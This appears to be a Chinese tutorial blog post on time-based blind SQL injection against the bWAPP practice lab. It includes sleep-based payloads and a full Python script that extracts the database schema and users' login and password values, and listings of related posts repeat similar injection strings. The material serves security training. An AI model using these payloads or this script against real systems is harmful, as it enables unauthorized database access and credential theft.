SQL注入-bWAPP靶场-时间盲注

已于 2023-02-13 14:15:14 修改
阅读量303 收藏 3
点赞数 1
分类专栏: SQL 文章标签: sql 数据库
于 2023-01-04 15:21:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62665450/article/details/128513089
版权

时间盲注步骤:

  1. 准备攻击:首先,攻击者需要准备攻击工具,如Burp Suite等。

  2. 构造查询:攻击者将构造出一个查询请求,该请求的结果可以通过询问数据库的响应时间来推断。

  3. 发送请求:攻击者将构造的请求发送到目标数据库,并开始计时。

  4. 分析响应时间:如果请求的结果在数据库中存在,则响应时间通常会比不存在的请求的响应时间长。攻击者可以利用这一点来推断数据库中的数据。

  5. 收集信息:如果攻击者能够成功泄露数据库中的敏感信息,他可以收集并利用这些信息。

  6. 反复攻击:最后,攻击者可以重复上述步骤,不断收集更多的敏感信息。

常用函数: 

sleep(n)               --返回0 命令中断返回1

substr(a,b,c)        --从b为止开始截取字符串a的c长度

count()                --计算总数

ascii()                  --返回字符串的ASCII码

length()               --返回字符串的长度

left(a,b)              --从左截取a的前b位

min(a,b,c)          --从位置b开始,截取a字符串的c位

ord()                  --返回第一个字符ascll值

benchmark(10000000,encode('hello','mom'))

MySQL 的 benchmark 的作用是测试 MySQL 数据库的性能。通过运行 benchmark 测试,可以了解 MySQL 数据库在不同条件下的性能表现,并且可以发现性能瓶颈所在,从而采取措施来优化性能。

运行 benchmark 测试可以帮助你了解 MySQL 数据库的吞吐量、响应时间、并发能力等性能指标。它还可以帮助你确定数据库配置参数的最佳值,并且可以帮助你评估新硬件或软件的性能表现。

运行 benchmark 测试还可以帮助你在更新或升级数据库时做出决策,确保新版本的性能不低于旧版本。它还可以帮助你验证数据库的可扩展性,并且可以帮助你在不同负载条件下评估数据库的稳定性。

目标:

  1. 获取到数据库名称长度
  2. 获取到数据库名称 
  3. 获取表名
  4. 获取字段名
  5. 获取数据(login  password)

目标一:

环境 :

(无回显)

 原始数据库查询SQL

SELECT * FROM `movies` WHERE Title='Iron Man' AND length(database())=5 AND sleep(3);

 靶场SQL:

Man of Steel' and length(database())=5 and sleep(4)#

 

 响应时间为4.02s说明length(database())=5条件成立

目标二:

原始数据库SQL

SELECT * FROM `movies` WHERE Title='Iron Man' AND substr(database(),1,1)='b' AND sleep(3);

靶场SQL:

Man of Steel' and substr(database(),1,1)='b' and sleep(4)#

  响应时间为4.02s说明substr(database(),1,1)='b'条件成立

(这个耗费时间太长,需要用到脚本)

完整脚本(py)

import time

import requests


# 获取数据库长度
def get_name_len():
    headers = {
        "Cookie": "security_level=0; PHPSESSID=5tukonprhupa850gp4db65bj9f"
    }
    for i in range(10):
        url = "http://localhost/bWAPP/bWAPP/sqli_15.php?title=Man of Steel' and length(database())={} and sleep(1)%23&Maction=search"
        url = url.format(i)
        time_strat = time.time()
        data = requests.get(url=url, headers=headers)
        if time.time() - time_strat > 1:
            print('长度是', i)
            return i


# 获取数据库name
def get_sql_name(count):
    headers = {
        "Cookie": "security_level=0; PHPSESSID=5tukonprhupa850gp4db65bj9f"
    }
    for j in range(count + 1):
        for i in range(33, 127):
            url = "http://localhost/bWAPP/bWAPP/sqli_15.php?title=Man of Steel' and ascii(substr(database(),{},1))={} and sleep(1)%23&Maction=search"
            url = url.format(j, i)
            time_strat = time.time()
            data = requests.get(url=url, headers=headers)
            if time.time() - time_strat > 1:
                print('name是', chr(i))
                break
    print('\n')


# 获取数据库中表的个数
def get_table_count():
    headers = {
        "Cookie": "security_level=0; PHPSESSID=5tukonprhupa850gp4db65bj9f"
    }
    for i in range(10):
        url = "http://localhost/bWAPP/bWAPP/sqli_15.php?title=Iron Man' AND\
(SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=database())={} AND sleep(1)%23&Maction=search"
        url = url.format(i)
        time_strat = time.time()
        data = requests.get(url=url, headers=headers)
        if time.time() - time_strat > 1:
            print('共有表个数:', i)
            return i


# 获取数据库中表的name
def get_table_name(count):
    headers = {
        "Cookie": "security_level=0; PHPSESSID=5tukonprhupa850gp4db65bj9f"
    }
    for j in range(count):
        print('\n' + "第{}个表名是:".format(j + 1))
        for k in range(1, 10):
            for i in range(33, 127):
                url = "http://localhost/bWAPP/bWAPP/sqli_15.php?title=Iron Man' AND \
                ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT {},1),{},1))={} AND sleep(1)%23&Maction=search"
                url = url.format(j, k, i)
                time_strat = time.time()
                data = requests.get(url=url, headers=headers)
                if time.time() - time_strat > 1:
                    print(chr(i), end='')
                    break
    print('\n')


# 获取数据库中表的字段个数
def get_users_count():
    headers = {
        "Cookie": "security_level=0; PHPSESSID=5tukonprhupa850gp4db65bj9f"
    }
    for i in range(16):
        url = "http://localhost/bWAPP/bWAPP/sqli_15.php?title=Iron Man' AND\
    (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_name='users')={} AND sleep(1)%23&Maction=search"
        url = url.format(i)
        time_strat = time.time()
        data = requests.get(url=url, headers=headers)
        if time.time() - time_strat > 1:
            print('users共有字段数:', i)
            return i


# 获取数据库中的字段名
def get_users_name(count):
    headers = {
        "Cookie": "security_level=0; PHPSESSID=5tukonprhupa850gp4db65bj9f"
    }
    for j in range(count):
        print('\n' + "第{}个字段是:".format(j + 1))
        for k in range(1, 20):
            for i in range(33, 127):
                url = "http://localhost/bWAPP/bWAPP/sqli_15.php?title=Iron Man' AND \
                   ascii(substr((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT {},1),{},1))={} AND sleep(1)%23&Maction=search"
                url = url.format(j, k, i)
                time_strat = time.time()
                data = requests.get(url=url, headers=headers)
                if time.time() - time_strat > 1:
                    print(chr(i), end='')
                    break
    print('\n')


# 获取数据库中users和password字段数据数量
def get_users_password_count():
    headers = {
        "Cookie": "security_level=0; PHPSESSID=5tukonprhupa850gp4db65bj9f"
    }
    for i in range(16):
        url = "http://localhost/bWAPP/bWAPP/sqli_15.php?title=Iron Man' AND\
        (SELECT COUNT(login) FROM users)={} AND sleep(1)%23&Maction=search"
        url = url.format(i)
        time_strat = time.time()
        data = requests.get(url=url, headers=headers)
        if time.time() - time_strat > 1:
            print('users和password字段共有数据数:', i)
            return i


# 获取数据库中users和password字段数据
def get_users_password_data(count):
    headers = {
        "Cookie": "security_level=0; PHPSESSID=5tukonprhupa850gp4db65bj9f"
    }
    for j in range(count):
        print('\n' + "第{}个数据是:".format(j + 1))
        for k in range(1, 55):
            for i in range(33, 127):
                url = "http://localhost/bWAPP/bWAPP/sqli_15.php?title=Iron Man' AND \
                      ascii(substr((SELECT concat(login,':',password) FROM users LIMIT {},1),{},1) )={} AND sleep(1)%23&Maction=search"
                url = url.format(j, k, i)
                time_strat = time.time()
                data = requests.get(url=url, headers=headers)
                if time.time() - time_strat > 1:
                    print(chr(i), end='')
                    break
    print('\n')


if __name__ == '__main__':
    get_sql_name(get_name_len())
    get_table_name(get_table_count())
    get_users_name(get_users_count())
    get_users_password_data(get_users_password_count())

XiaoBaiOne-1
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【bwapp】SQL Injection(GET/Search)——low级别
用博客做做记录的小白
06-13 607
bwapp靶场sql注入关卡低级难度,采用手工注入和自动化注入两种方式实现sql注入
bwapp靶场笔记 -SQL注入
m0_52149675的博客
10-30 1569
​启动靶场
bWAPP靶场安装
最新发布
CheatMyself的博客
07-03 385
打开:D:\ProgramFiles\phpstudy_pro\WWW\bWAPP-master\app\admin下的settings.php,的数据库账号密码。百度网盘地址:链接:https://pan.baidu.com/s/1Y-LvHxyW7SozGFtHoc9PKA。链接:https://pan.baidu.com/s/1pr9v0_p6mgChvWcIx1dn7g。git地址:https://github.com/raesene/bWAPP。–来自百度网盘超级会员V5的分享。
BWAPPsql注入部分详解
tianzhende_kun的博客
02-28 817
可以看到, 联合查询3的位置对应password字段, 且password字段的值是经过md5加密过的, 由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等。注入语句IronMan' and if (length(database())=5,sleep(5),1) --1。' union select 1,2,3,4,5,6,7,8,9,10 # 报错。尝试万能密码: 1’ or 1=1 –- 1。尝试万能密码:1' or 1=1 -- 1。
时间盲注靶场作业
weixin_45540609的博客
04-17 174
题目1 无论输入什么,都会显示有数据 这里采用时间盲注,输入1" and sleep(10) -- qwe,有明显的延时,说明存在时间盲注 1" and if(length(database())>5,sleep(8),1) -- qwe 反复尝试看没有延时感觉的时候,得到数据库长度为12 1" and if(ascii(substr(database(),1,1)<128),sleep(8),1) -- qwe 用sqlmap跑出 1'andup...
sqli-labs靶场时间盲注
2302_78903258的博客
05-19 619
这里可以解释为当我们进行数据库名的长度判断时,如果条件成立,sleep函数延迟3秒后回显界面,如果条件不成立,就输出0 -----提示一下,如果大家网络有延迟的话,将sleep()函数里面的值设置为大一点,5啊10啊都ok的。这里的判断语句跟布尔盲注基本是一样的,所以大家不懂得话可以先学一下布尔盲注,这里获得的是库名的第一个字符,其他字符只需要更改substr()函数的值就ok了-------可以的到数据库名为security。获得数据---------这里同样也有两种用法。
sqli-labs靶场练习笔记
11-09
- **核心技能**:熟练掌握SQL注入的基本原理与技术手段,包括联合查询、布尔盲注时间盲注等。 - **实战经验**:通过解决具体的关卡问题,积累实战经验,提高解决问题的能力。 - **安全意识**:了解SQL注入的危害性...
web-报错注入-皮卡丘靶场
07-15
防止报错注入的关键在于对用户输入进行严格的验证和过滤,避免在错误消息中泄露敏感信息,以及使用预编译的SQL语句(如参数化查询或存储过程),以减少SQL注入的风险。在进行渗透测试或安全训练时,皮卡丘靶场提供了...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入盲注类型,并...
sql-bypass靶场
03-19
在"sql-bypass靶场"中,我们面对的是一个带有过滤机制的SQL注入场景,这意味着靶场已经设置了一些防御措施,以防止直接的SQL注入攻击。为了成功利用这个靶场,我们需要了解如何绕过这些过滤机制,这通常涉及到一些...
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
跟bWAPP学WEB安全(PHP代码)--SQL注入的一些技巧
weixin_30399155的博客
01-20 503
背景 模拟环境还是 bWAPP,只不过这个bWAPP的SQL注入有点多,一一写意义不大,在这边就利用这个环境来尝试一些SQL注入的技巧。并研究下PHP的防御代码。 普通的bWAPPSQL注入的简单介绍 从get型search到CAPTCHA 简单级 #search http://192.168.195.195/bWAPP/sqli_1.php?title=c%%27union%20sel...
基于时间盲注
热门推荐
weixin_40709439的博客
09-01 1万+
延时注入,用的最多的注入 常用的判断语句: ' and if(1=0,1, sleep(10)) --+  " and if(1=0,1, sleep(10)) --+ ) and if(1=0,1, sleep(10)) --+ ') and if(1=0,1, sleep(10)) --+ ") and if(1=0,1, sleep(10)) --+   写这篇文章只是为了更...
bWAPP练习--injection篇SQL Injection (GET/Search)
weixin_38167363的博客
04-09 998
SQL注入SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 LOW: 0x01:分析一下网站的...
时间盲注之book靶场实战
weixin_46163639的博客
05-24 467
对book网站使用时间盲注 先判断是否有时间盲注和类型:qqq’and sleep(5)# 判断数据长度:qqq’ and if(length(database())>=9,sleep(5),1)# 用抓包工具(bburpsuite)爆数据库名: guestbook username=qqq’ and if (substr(database(),§§,1)=’§§’, sleep(5),1) # &password= 爆表名:user username=qqq’ and if (substr
3.bWAPP SQL注入
众生度尽,方证菩提
01-23 2895
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
bwapp通关html之后sql注入之前
h0ld1rs的博客
08-13 296
文章目录iFrame InjectionlowmediumLDAPMail Header InjectionlowmediumhighOS Command Injection - BlindPHP Code Injectionlowmedium high iFrame Injection iframe是可用于在HTML页面中嵌入一些文件(如文档,视频等)的一项技术。对iframe最简单的解释就是“iframe是一个可以在当前页面中显示其它页面内容的技术”。 通过利用iframe标签对网站页面进行注入,是利
bwapp闯关(一)SQL injection<low>
weixin_44894271的博客
05-17 452
前言 本文章记录bwapp的SQL injection模块,web安全测试SQL注入 环境准备 docker部署bwapp火狐浏览器安装hackbar插件,登录进入bwapp页面,选择bug类型<SQL injection(GET/Search)>,并设置安全等级为low 按照字段搜索可以看到查询结果信息列表如下 单引号注入检测 根据搜索查询业务我们可以猜想查询用户信息列表的SQL大致为:select XX from database where title = “id”,此时titl
bwapp---sql注入第三四关过关过程及分析
weixin_45821250的博客
12-04 1288
这个是POST,要用bp来做,过程和之前一样。 这里说下bp操作的要点,首先你要在bp的proxy的option添加你的代理,我们一般用本机的127.0.0.1:8080,浏览器的代理也要设置,这里推荐FoxyProxy。代理设置好后,打开抓包按钮 之后获取的信息放在重放器里。进行分析。 如果要get和post一起请求可以在上面GET构造,在下面写post的内容 get请求了1,post请求了123456 ...
sql注入-pikachu靶场
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员账户的密码。具体步骤如下: 1. 在登录页面输入用户名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值